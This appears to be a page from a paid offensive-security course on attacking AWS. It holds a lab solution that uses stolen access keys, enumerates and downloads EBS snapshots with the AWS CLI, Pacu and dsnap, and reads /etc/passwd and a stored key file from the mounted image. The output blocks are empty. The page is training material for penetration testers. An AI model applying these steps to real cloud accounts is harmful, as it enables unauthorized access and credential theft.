Breaching AWS

Introduction
Introduction
2 Topics
How to access the Labs
BAWS Lab Objectives
Breaching AWS – Rules of Engagement
Breaching TWOCAPITALS
BAWS 01 – Enumerating S3 Buckets
2 Topics
BAWS 01 – Lab
BAWS 01 – Lab Solution
BAWS 02 – AWS Subdomain Takeover
BAWS 02 – Dumping EBS Secrets
3 Topics
BAWS 02 – Lab 2
BAWS 02 – Video Walkthrough
BAWS 02 – Lab 2 – Solution
BAWS 03 – Enumeration & Command Execution via SSM
3 Topics
BAWS 03 – Lab 1
BAWS 03 – Video Walkthrough
BAWS 03 – Lab 1 Solution
BAWS 04 – Abuse IAM User Roles, Instance Metadata & SNS
3 Topics
BAWS 04 – Abusing Instance Metadata Service (IMDS)
BAWS 04 – Lab
BAWS 04 – Lab Solution
BAWS 05 – Capture Credentials from SNS Service
2 Topics
BAWS 05 – Lab
BAWS 05 – Lab Solution
BAWS 06 – Get Remote Code Execution on a Lambda Function
2 Topics
BAWS 06 – Lab
BAWS 06 – Lab Solution
BAWS 07 – Enumerate and Read Data from DynamoDB
2 Topics
BAWS 07 – Lab
BAWS 07 – Lab Solution
BAWS 08 – Upload Malicious Image into ECR
2 Topics
BAWS 08 – Lab
BAWS 08 – Lab Solution
BAWS 09 – AWS SSO Phishing Attack
2 Topics
BAWS 09 – Lab
BAWS 09 – Lab Solution
BAWS 10 – Enumerate AWS IAM Identity Center Permissions
2 Topics
BAWS 10 – Lab
BAWS 10 – Lab Solution
BAWS 11 – Enumerate AWS IAM Permission & Retrieve Secrets from Secret Manager
2 Topics
BAWS 11 – Lab 1
BAWS 11 – Lab Solution
BAWS 12 – Utilising Rancher to Gain Shell Access to a Pod
3 Topics
BAWS 12 – Amazon Elastic Kubernetes Service (AWS EKS)
BAWS 12 – Lab
BAWS 12 – Lab Solution
BAWS 13 – Enumerate RDS and Retrieve the Final Flag
2 Topics
BAWS 13 – Lab
BAWS 13 – Lab Solution
Previous Topic
Next Lesson

BAWS 02 – Lab 2 – Solution

Breaching AWS BAWS 02 – Dumping EBS Secrets BAWS 02 – Lab 2 – Solution

Using the aws configure, we set up the AWS keys of the AWS account previously compromised in Lab 1. As we don’t know the region name, keep the default (us-east-1)

aws configure

Output:

We then execute the AWS caller identity command in order to retrieve the UserID, Username, and the Account ID.

 aws sts get-caller-identity

Output:

From the output we can observe that we have tomas access keys and the Account ID is 999143725571.

Based on the tomasnotes file (Lab 1), it’s seems that tomas is waiting for his EBS Snapshot to be ready. In other words, he is waiting for an EC2 volume to be backed up.

Since we don’t know the region name, let’s execute our first attempt to discover EC2 snapshots in the “us-east-1” region. (Subsequently we can try one by one all 32 AWS regions.)

It should be noted that the –owner-id is the AccountID that we found before and is required in order to be able to retrieve only the snapshots available for our account id.

aws ec2 describe-snapshots --region us-east-1 --owner-id 999143725571

Output:

We are not authorised to perform describe-snapshots in region us-east-1

Second attempt to discover EC2 snapshot in the “us-east-2” region returns snapshots details.

aws ec2 describe-snapshots --region us-east-2 --owner-id 999143725571

Output:

Enumeration can also be done automatically using a tool such as Pacu. Open a new tab on your terminal, go to Tools/pacu and run the cli.py. Then press 0 to create a New Session, name it tomasebs and press enter.

cd Desktop/Tools/pacu
./cli.py

Output:

Then import your existing AWS keys into pacu and run ebs module enumeration:

> import_keys --all
> run ebs__enum_volumes_snapshots --account-ids 999143725571 

Output:

The snapshot has been found. Another powerful tool for downloading and enumerating EBS snapshots is dsnap by Rhino Security.

dsnap --region us-east-2 list

Output:

Then download the snapshot:

dsnap --region us-east-2 get snap-05093cd5707afde19

It should be noted that the snapshot is 8 GB and will take some time to be downloaded.

Output:

After downloading the snapshot, navigate to Desktop/Tools/dsnap/ and run the following command to run it in a docker. (It will take some time to mount it):

cd Desktop/Tools/dsnap
sudo IMAGE=home/cb8000/snap-05093cd5707afde19.img make docker/run

Searching through the snapshots, user account “tomas_sysadmin” caught our attention. Probing through the user’s home directory revealed a set of AWS keys we can utilise later on.

><fs> cat /etc/passwd 

Output:

Enumerating the tomas_sysadmin home directory we ended up on AWS keys.

ls /home/tomas_sysadmin
ls /home/tomas_sysadmin/mykeys
cat /home/tomas_sysadmin/mykeys/mykeys.txt

Output:

Previous Topic
Back to Lesson
Next Lesson